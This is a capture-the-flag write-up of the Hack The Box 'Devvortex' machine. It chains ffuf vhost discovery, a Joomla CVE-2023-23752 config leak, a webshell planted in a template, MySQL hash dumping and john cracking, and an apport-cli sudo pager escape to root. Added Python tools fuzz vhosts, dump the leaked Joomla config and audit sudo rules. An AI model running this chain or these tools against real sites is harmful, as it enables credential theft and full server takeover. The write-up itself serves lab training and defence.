Devvortex

Recon

nmap_scan.log

HTTP (80)

Seems to be a placeholder website.

Writeup.png

Enumerate subdomains:

└─$ domain='devvortex.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
       v2.1.0-dev 
dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 120ms]
:: Progress: [4989/4989] :: Job [1/1] :: 277 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
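The same virtual-host check as an added example (not from the original writeup): instead of filtering on a hard-coded word count as `-fw 4` does, it fetches a baseline for a Host that cannot exist and reports only candidates whose status/size/word-count fingerprint differs from it. The fetcher is injectable so the filtering logic can be exercised offline; the default uses urllib.

```python
"""Virtual-host discovery by Host-header fuzzing with baseline filtering.

Added example, not part of the writeup. Equivalent to
  ffuf -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -w list -mc all -fw 4
but the filter is derived from a baseline request rather than hard-coded.
"""
import os
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# A fetcher takes (url, host_header) and returns (status, body).
Fetcher = Callable[[str, str], Tuple[int, bytes]]
Fingerprint = Tuple[int, int, int]  # (status, size in bytes, word count)


def urllib_fetch(url: str, host: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Default fetcher: GET `url` with the Host header overridden to `host`."""
    req = urllib.request.Request(url, headers={"Host": host, "User-Agent": "vhost-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()  # 4xx/5xx bodies are still worth fingerprinting


def fingerprint(status: int, body: bytes) -> Fingerprint:
    """The three fields ffuf matches and filters on (-mc, -fs, -fw)."""
    return status, len(body), len(body.split())


def find_vhosts(url: str, domain: str, words: List[str],
                fetch: Fetcher = urllib_fetch) -> Dict[str, Fingerprint]:
    """Return {candidate_host: fingerprint} for every response that differs from the baseline."""
    # A random label lands on the server's default vhost; that response is the noise to drop.
    baseline_host = f"baseline-{os.urandom(4).hex()}.{domain}"
    baseline = fingerprint(*fetch(url, baseline_host))
    hits: Dict[str, Fingerprint] = {}
    for word in words:
        host = f"{word}.{domain}"
        fp = fingerprint(*fetch(url, host))
        if fp != baseline:
            hits[host] = fp
    return hits


if __name__ == "__main__":
    import sys
    # Usage: python3 vhosts.py http://TARGET/ devvortex.htb subdomains-top1million-5000.txt
    target, dom, wordlist = sys.argv[1:4]
    with open(wordlist, encoding="utf-8", errors="ignore") as fh:
        candidates = [line.strip() for line in fh if line.strip()]
    for host, (status, size, nwords) in find_vhosts(target, dom, candidates).items():
        print(f"{host}\t[Status: {status}, Size: {size}, Words: {nwords}]")
```

A baseline-derived filter survives a default vhost that returns something other than a 4-word page; if the target rate-limits, the baseline should be refreshed periodically since a throttled response would otherwise show up as a hit.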

Same vibes

Writeup-1.png

Seemed like WordPress, but I guess not.

Writeup-2.png

Joomla

Googling the error text "The requested page can't be found." led to Joomla.

It can be enumerated with the joomscan tool:

[+] Detecting Joomla Version
[++] Joomla 4.2.6

CVE-2023-23752

Joomla! CVE-2023-23752 to Code Execution

CVE-2023-23752 is an improper access check in the Joomla 4 web-services API (4.0.0 through 4.2.7, fixed in 4.2.8): adding public=true to an API request lets an unauthenticated client read endpoints such as v1/config/application, which returns the site configuration including the database user and password.

└─$ curl http://dev.devvortex.htb/api/index.php/v1/config/application?public=true -s | jq .
{
  "links": {
    "self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true",
    "next": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20",
    "last": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"
  },
  "data": [
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_message": "This site is down for maintenance.<br>Please check back again soon.",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "display_offline_message": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_image": "",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "sitename": "Development",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "editor": "tinymce",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "captcha": "0",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "list_limit": 20,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "access": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang_const": true,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbtype": "mysqli",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "host": "localhost",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "db": "joomla",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbprefix": "sd4fg_",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbencryption": 0,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbsslverifyservercert": false,
        "id": 224
      }
    }
  ],
  "meta": {
    "total-pages": 4
  }
}

Creds: lewis:P4ntherg0t1n5r3c0n##
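A checker for the leak as an added example (not from the writeup or the VulnCheck post): it classifies the response, merges Joomla's one-setting-per-entry `data` list into a flat dict, and follows `links.next`, because the `meta` block shows the configuration spans four pages (the first page happened to hold the DB credentials; later ones hold e.g. the site `secret`). The sample body is a trimmed, constructed copy of the response above; the 401/403 handling for a patched site is an assumption.

```python
"""Check a Joomla site for CVE-2023-23752 and pull the leaked configuration.

Added example, not part of the writeup. Affected: Joomla 4.0.0-4.2.7.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Tuple

CONFIG_PATH = "/api/index.php/v1/config/application?public=true"
SENSITIVE = ("dbtype", "host", "user", "password", "db", "dbprefix", "secret")

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status, body)


def urllib_fetch(url: str, timeout: float = 5.0) -> Tuple[int, str]:
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2023-23752-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def flatten_attributes(doc: dict) -> Dict[str, object]:
    """Joomla returns one setting per 'data' entry; merge them into a flat dict."""
    merged: Dict[str, object] = {}
    for item in doc.get("data", []):
        for key, value in item.get("attributes", {}).items():
            if key != "id":
                merged[key] = value
    return merged


def classify(status: int, body: str) -> str:
    """'vulnerable' when the config is readable anonymously; 'not_vulnerable' when the
    API rejects the request (assumed 401/403 on a patched site); otherwise 'unknown'."""
    if status in (401, 403):
        return "not_vulnerable"
    if status != 200:
        return "unknown"
    try:
        cfg = flatten_attributes(json.loads(body))
    except ValueError:
        return "unknown"  # not JSON: API disabled, WAF page, not Joomla at all
    return "vulnerable" if ("user" in cfg or "password" in cfg) else "unknown"


def leaked_db_config(status: int, body: str) -> Dict[str, object]:
    """Only the settings an attacker cares about, empty unless the leak is confirmed."""
    if classify(status, body) != "vulnerable":
        return {}
    cfg = flatten_attributes(json.loads(body))
    return {k: cfg[k] for k in SENSITIVE if k in cfg}


def dump_full_config(base_url: str, fetch: Fetcher = urllib_fetch) -> Dict[str, object]:
    """Walk every page of the config endpoint via links.next and merge the attributes."""
    url = base_url.rstrip("/") + CONFIG_PATH
    merged: Dict[str, object] = {}
    seen = set()
    while url and url not in seen:  # guard against a server that loops 'next'
        seen.add(url)
        status, body = fetch(url)
        if status != 200:
            break
        doc = json.loads(body)
        merged.update(flatten_attributes(doc))
        url = doc.get("links", {}).get("next")
    return merged


# Constructed sample: a trimmed copy of the response captured in the writeup.
SAMPLE_BODY = json.dumps({
    "links": {"self": "http://dev.devvortex.htb" + CONFIG_PATH},
    "data": [
        {"type": "application", "id": "224", "attributes": {"sitename": "Development", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "lewis", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "P4ntherg0t1n5r3c0n##", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_", "id": 224}},
    ],
    "meta": {"total-pages": 4},
})


if __name__ == "__main__":
    import sys
    # Usage: python3 joomla_23752.py http://dev.devvortex.htb
    st, bd = urllib_fetch(sys.argv[1].rstrip("/") + CONFIG_PATH)
    print(classify(st, bd))
    for key, value in leaked_db_config(st, bd).items():
        print(f"  {key}: {value}")
```

On the defensive side the same classifier works as a post-patch regression check: a 4.2.8+ site should never answer "vulnerable", and a Joomla instance that does not need the web-services API should have the plugin disabled so the endpoint is not reachable at all.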

RCE

The database password is reused for lewis's Joomla account, so log in to the backend at http://dev.devvortex.htb/administrator/ with lewis:P4ntherg0t1n5r3c0n##. Then System > Site Templates > Cassiopeia > edit error.php and replace its contents with a webshell (I used p0wny webshell).

To reach the webshell, request the edited template file: http://dev.devvortex.htb/templates/cassiopeia/cassiopeia/error.php

Writeup-3.png
www-data@devvortex:…/www/dev.devvortex.htb# cat configuration.php
<?php
class JConfig {
	public $offline = false;
	public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
	public $display_offline_message = 1;
	public $offline_image = '';
	public $sitename = 'Development';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = 20;
	public $access = 1;
	public $debug = false;
	public $debug_lang = false;
	public $debug_lang_const = true;
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'lewis';
	public $password = 'P4ntherg0t1n5r3c0n##';
	public $db = 'joomla';
	public $dbprefix = 'sd4fg_';
	public $dbencryption = 0;
	public $dbsslverifyservercert = false;
	public $dbsslkey = '';
	public $dbsslcert = '';
	public $dbsslca = '';
	public $dbsslcipher = '';
	public $force_ssl = 0;
	public $live_site = '';
	public $secret = 'ZI7zLTbaGKliS9gq';
	public $gzip = false;
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $offset = 'UTC';
	public $mailonline = true;
	public $mailer = 'mail';
	public $mailfrom = 'lewis@devvortex.htb';
	public $fromname = 'Development';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = false;
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = 25;
	public $caching = 0;
	public $cache_handler = 'file';
	public $cachetime = 15;
	public $cache_platformprefix = false;
	public $MetaDesc = '';
	public $MetaAuthor = true;
	public $MetaVersion = false;
	public $robots = '';
	public $sef = true;
	public $sef_rewrite = false;
	public $sef_suffix = false;
	public $unicodeslugs = false;
	public $feed_limit = 10;
	public $feed_email = 'none';
	public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
	public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
	public $lifetime = 15;
	public $session_handler = 'database';
	public $shared_session = false;
	public $session_metadata = true;
}

Database Enumeration

Enumerate the database (passing the password inline with -p'…' puts it in the process list and shell history; on a shared box prefer a plain -p so mysql prompts for it):

www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' -e 'SHOW DATABASES;'
Database
information_schema
joomla
performance_schema

www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SHOW TABLES;'
Tables_in_joomla
...
sd4fg_user_keys
sd4fg_user_mfa
sd4fg_user_notes
sd4fg_user_profiles
sd4fg_user_usergroup_map
sd4fg_usergroups
sd4fg_users
...
www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SELECT username, password FROM sd4fg_users;'
username	password
lewis	$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan	$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Crack logan's hash with john and rockyou (the hash file holds only logan's line):

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho    (?)
1g 0:00:00:11 DONE (2024-11-24 16:34) 0.08750g/s 126.0p/s 126.0c/s 126.0C/s lacoste..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
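Before handing hashes to a cracker it helps to know what they are. As an added example (not from the writeup), this parses Joomla 4's bcrypt hashes (PHP password_hash(), modular crypt format `$2y$<cost>$<22-char salt><31-char digest>`) to recover the variant and cost, and converts the tab-separated `mysql -e` output above into the user:hash lines john and hashcat (-m 3200) accept. The two rows are copied from the SELECT output above; the "iterations" value it derives is what john prints as "Cost 1 (iteration count)".

```python
"""Inspect Joomla bcrypt hashes and prepare a john/hashcat input file.

Added example, not part of the writeup.
"""
import re
from typing import Dict, List

BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)


def parse_bcrypt(h: str) -> Dict[str, object]:
    """Split a bcrypt MCF string into its fields; cost is log2 of the round count."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError(f"not a bcrypt hash: {h!r}")
    cost = int(m["cost"])
    if not 4 <= cost <= 31:  # the range bcrypt implementations accept
        raise ValueError(f"bcrypt cost out of range: {cost}")
    return {
        "variant": m["variant"],      # $2y$ is PHP's variant; john/hashcat accept it as-is
        "cost": cost,
        "iterations": 2 ** cost,      # john reports this as "Cost 1 (iteration count)"
        "salt": m["salt"],
        "digest": m["digest"],
    }


def mysql_tsv_to_john(tsv: str) -> List[str]:
    """Turn `mysql -e 'SELECT username, password ...'` output (tab-separated, header
    row first) into user:hash lines, skipping rows that are not bcrypt."""
    lines: List[str] = []
    for row in tsv.splitlines():
        if not row.strip():
            continue
        user, _, h = row.partition("\t")
        if user == "username":  # header row emitted by mysql -e
            continue
        try:
            parse_bcrypt(h)
        except ValueError:
            continue  # e.g. a legacy md5 entry; would need a different john format
        lines.append(f"{user}:{h}")
    return lines


# Rows copied from the SELECT output in the writeup.
SAMPLE_TSV = (
    "username\tpassword\n"
    "lewis\t$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u\n"
    "logan\t$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12\n"
)


if __name__ == "__main__":
    for line in mysql_tsv_to_john(SAMPLE_TSV):
        user, h = line.split(":", 1)
        info = parse_bcrypt(h)
        print(f"{user}: {info['variant']} cost={info['cost']} ({info['iterations']} rounds)")
    with open("hashes", "w", encoding="utf-8") as fh:
        fh.write("\n".join(mysql_tsv_to_john(SAMPLE_TSV)) + "\n")
```

Cost 10 is why john reports only ~126 candidates per second above: at that rate a full pass over rockyou (roughly 14.3 million lines) is on the order of 30 hours per hash, which is the argument for cracking one targeted hash (logan, the user who exists on the box) rather than every row in the table.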

SSH

logan is also a local user on the box, and the cracked Joomla password is reused for that account:

www-data@devvortex:…/www/dev.devvortex.htb# echo 'tequieromucho' | su - logan -c 'id'
Password: uid=1000(logan) gid=1000(logan) groups=1000(logan)

Creds: logan:tequieromucho

└─$ ssh logan@devvortex.htb -i id_rsa

User.txt

logan@devvortex:~$ cat user.txt
69399d0a3174a352c65bcab90c17a8e8

Privilege Escalation

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

CVE-2023-1326-PoC

apport-cli 2.26.0 and earlier (CVE-2023-1326) shows a crash report through the user's pager when V is chosen on a terminal. Run under sudo, that pager is root's, and less accepts !command, so !/bin/bash spawns a root shell. All that is needed is a crash file to view, which any user can produce by killing one of their own processes with SIGSEGV:

logan@devvortex:~$ sleep 60 &
[1] 2151
logan@devvortex:~$ kill -SIGSEGV 2151
logan@devvortex:~$ ls /var/crash/
_usr_bin_sleep.1000.crash
[1]+  Segmentation fault      (core dumped) sleep 60
logan@devvortex:~$ sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (30.0 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
........................................................................................................................................................................................................................................................................................................................................................................<snip>
......................................................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
........!./b.in./ba.sh
root@devvortex:/home/logan# id
uid=0(root) gid=0(root) groups=0(root)

Note: The dots kept printing, but if you just enter !/bin/bash the shell will spawn.
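The lesson for the defender is the sudo rule itself. As an added example (not from the writeup), this parses the rule block of `sudo -l` output and flags commands that are known to drop into a pager or editor under the caller's privileges; the sample input is logan's sudo -l output above, and the list of flagged binaries is an assumed starting set, not a complete GTFOBins catalogue.

```python
"""Audit `sudo -l` output for commands that hand the user a pager or editor.

Added example, not part of the writeup.
"""
import re
from typing import Dict, List

# Binary -> why a sudo rule for it is dangerous. Assumed, partial list.
PAGER_SPAWNERS: Dict[str, str] = {
    "/usr/bin/apport-cli": "CVE-2023-1326: 'V' opens the report in less; !/bin/bash gives a root shell",
    "/usr/bin/less": "!command runs a shell from inside the pager",
    "/usr/bin/more": "!command runs a shell from inside the pager",
    "/usr/bin/man": "man pages are shown in less; !command escapes",
    "/usr/bin/vi": ":!command or :shell",
    "/usr/bin/vim": ":!command or :shell",
    "/usr/bin/systemctl": "long output is paged through less; !command escapes",
    "/usr/bin/journalctl": "output is paged through less; !command escapes",
}

# "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """One dict per command listed under 'may run the following commands'."""
    rules: List[Dict[str, object]] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip(": ") for t in m["tags"].split() if t.strip(": ")]
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            rules.append({
                "runas": m["runas"].strip(),
                "tags": tags,               # e.g. ["NOPASSWD"]
                "command": cmd,
                "binary": cmd.split()[0],   # path without arguments
            })
    return rules


def audit(output: str) -> List[Dict[str, object]]:
    """Rules whose binary is a known pager/editor spawner, with the reason attached."""
    findings: List[Dict[str, object]] = []
    for rule in parse_sudo_l(output):
        reason = PAGER_SPAWNERS.get(str(rule["binary"]))
        if reason:
            findings.append({**rule, "reason": reason})
    return findings


# Copied from the `sudo -l` output in the writeup.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
"""


if __name__ == "__main__":
    import subprocess
    import sys
    # With no argument, audit this host's own `sudo -l`; pass a file to audit saved output.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else \
        subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    for f in audit(text or SAMPLE_SUDO_L):
        print(f"({f['runas']}) {f['command']}: {f['reason']}")
```

Granting sudo on a single "harmless" binary is not least privilege if that binary can hand the terminal to a pager; the fix here is to remove the rule (or upgrade apport), and the same audit catches the more common less/man/vim rules that fail the same way.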

root@devvortex:~# cat root.txt
1c4cce162d7ff2b42bc2241bdfc4d691
